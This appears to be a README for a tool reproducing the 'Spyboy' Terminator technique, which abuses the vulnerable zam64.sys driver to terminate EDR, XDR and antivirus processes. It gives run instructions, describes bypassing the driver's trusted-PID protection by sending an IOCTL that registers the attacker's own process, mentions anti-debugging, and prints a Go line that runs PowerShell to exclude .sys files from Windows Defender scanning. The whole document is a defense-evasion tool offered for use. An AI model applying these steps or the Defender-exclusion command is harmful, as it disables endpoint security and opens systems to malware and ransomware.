- Reproducing Spyboy technique, which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver
- Spyboy was selling the Terminator software at a price of $3,000 for more detail
- the sample is sourced from loldrivers
- Place the driver
Terminator.sysin the same path as the executable - run the program as an administrator
- keep the program running to prevent the service from restarting the anti-malwares
-
The driver contains some protectiion mechanism that only allow trusted Process IDs to send IOCTLs, Without adding your process ID to the trusted list, you will receive an 'Access Denied' message every time. However, this can be easily bypassed by sending an IOCTL with our PID to be added to the trusted list, which will then permit us to control numerous critical IOCTLs
-
Comes with simple antidbg.
-
Add This so WD Ignores defender by this quick sample
exec.Command("powershell", "-Command", "Set-MpPreference -ExclusionExtension *.sys -Force").Run()
Credits
- Credits to ZeroMemoryX 👍